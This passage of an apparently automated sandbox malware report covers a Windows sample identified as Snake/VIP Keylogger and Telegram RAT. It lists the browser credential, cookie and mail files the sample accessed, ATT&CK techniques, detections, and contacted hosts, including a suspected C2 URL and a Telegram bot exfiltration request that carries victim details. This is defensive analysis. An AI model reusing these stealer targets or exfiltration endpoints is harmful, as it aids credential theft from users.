                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeCode function: 0_2_00412A15 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_00412A15
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected Snake Keylogger
                Source: Yara matchFile source: 00000000.00000002.3680555614.0000000002581000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Yara detected Telegram RAT
                Source: Yara matchFile source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.4b10000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.2510000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.2510f20.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.4b10000.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.2510000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.5993c8.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.21e096e.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.5993c8.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.21e096e.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.21dfa4e.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.21dfa4e.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.2510f20.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.3680474042.0000000002510000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.3680219569.000000000219F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1234929612.0000000000599000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.3685378701.0000000004B10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe PID: 6748, type: MEMORYSTR
                Yara detected VIP Keylogger
                Source: Yara matchFile source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.4b10000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.2510000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.2510f20.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.4b10000.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.2510000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.5993c8.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.21e096e.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.5993c8.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.21e096e.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.21dfa4e.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.21dfa4e.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.2510f20.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.3680474042.0000000002510000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.3680219569.000000000219F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1234929612.0000000000599000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.3685378701.0000000004B10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe PID: 6748, type: MEMORYSTR
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                Source: C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: Yara matchFile source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.4b10000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.2510000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.2510f20.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.21dfa4e.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.4b10000.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.2510000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.5993c8.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.21e096e.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.21dfa4e.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.5993c8.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.21e096e.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.2510f20.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.3680474042.0000000002510000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.3680219569.000000000219F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1234929612.0000000000599000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.3685378701.0000000004B10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe PID: 6748, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected Snake Keylogger
                Source: Yara matchFile source: 00000000.00000002.3680555614.0000000002581000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Yara detected Telegram RAT
                Source: Yara matchFile source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.4b10000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.2510000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.2510f20.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.4b10000.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.2510000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.5993c8.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.21e096e.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.5993c8.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.21e096e.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.21dfa4e.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.21dfa4e.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.2510f20.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.3680474042.0000000002510000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.3680219569.000000000219F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1234929612.0000000000599000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.3685378701.0000000004B10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe PID: 6748, type: MEMORYSTR
                Yara detected VIP Keylogger
                Source: Yara matchFile source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.4b10000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.2510000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.2510f20.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.4b10000.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.2510000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.5993c8.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.21e096e.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.5993c8.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.21e096e.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.21dfa4e.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.21dfa4e.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe.2510f20.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.3680474042.0000000002510000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.3680219569.000000000219F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1234929612.0000000000599000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.3685378701.0000000004B10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe PID: 6748, type: MEMORYSTR

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		1
                DLL Side-Loading                		1
                Disable or Modify Tools                		1
                OS Credential Dumping                		1
                System Time Discovery                		Remote Services1
                Email Collection                		1
                Web Service                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                Native API                		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts31
                Virtualization/Sandbox Evasion                		LSASS Memory31
                Security Software Discovery                		Remote Desktop Protocol11
                Archive Collected Data                		11
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Deobfuscate/Decode Files or Information                		Security Account Manager31
                Virtualization/Sandbox Evasion                		SMB/Windows Admin Shares1
                Data from Local System                		3
                Ingress Tool Transfer                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
                Obfuscated Files or Information                		NTDS2
                Process Discovery                		Distributed Component Object ModelInput Capture4
                Non-Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                DLL Side-Loading                		LSA Secrets1
                Application Window Discovery                		SSHKeylogging15
                Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials1
                System Network Configuration Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync24
                System Information Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe50%ReversingLabsWin32.Infostealer.ClipBanker
                173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe100%AviraHEUR/AGEN.1305924
                173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://the.drillmmcsnk.top/den/P4.php0%Avira URL Cloudsafe
                http://the.drillmmcsnk.top/den/api.php0%Avira URL Cloudsafe
                http://the.drillmmcsnk.top0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                reallyfreegeoip.org
                		104.21.67.152
                		truefalse
                  		high
                  api.telegram.org
                  		149.154.167.220
                  		truefalse
                    		high
                    the.drillmmcsnk.top
                    		5.182.211.149
                    		truefalse
                      		unknown
                      checkip.dyndns.com
                      		132.226.8.169
                      		truefalse
                        		high
                        checkip.dyndns.org
                        		unknown
                        		unknownfalse
                          		high

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:258555%0D%0ADate%20and%20Time:%2027/11/2024%20/%2012:08:33%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20258555%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                            		high
                            http://the.drillmmcsnk.top/den/P4.phpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://reallyfreegeoip.org/xml/8.46.123.75false
                              		high
                              http://checkip.dyndns.org/false
                                		high

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                https://www.office.com/173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.0000000002742000.00000004.00000800.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.0000000002733000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://duckduckgo.com/chrome_newtab173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.0000000003605000.00000004.00000800.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.0000000003631000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://duckduckgo.com/ac/?q=173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.0000000003605000.00000004.00000800.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.0000000003631000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://api.telegram.org173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.0000000002667000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://www.google.com/images/branding/product/ico/googleg_lodp.ico173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.0000000003605000.00000004.00000800.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.0000000003631000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://api.telegram.org/bot173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680219569.000000000219F000.00000004.00000020.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680474042.0000000002510000.00000004.08000000.00040000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000003.1234929612.0000000000599000.00000004.00000020.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.0000000002667000.00000004.00000800.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3685378701.0000000004B10000.00000004.08000000.00040000.00000000.sdmpfalse
                                            		high
                                            https://www.office.com/lB173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.000000000273D000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://crl.mic173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000003.1560769620.0000000005783000.00000004.00000020.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000003.1749864993.0000000005789000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.0000000003605000.00000004.00000800.00020000.00000000.sdmp, 173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3682681877.0000000003631000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://checkip.dyndns.org173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe, 00000000.00000002.3680555614.0000000002581000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
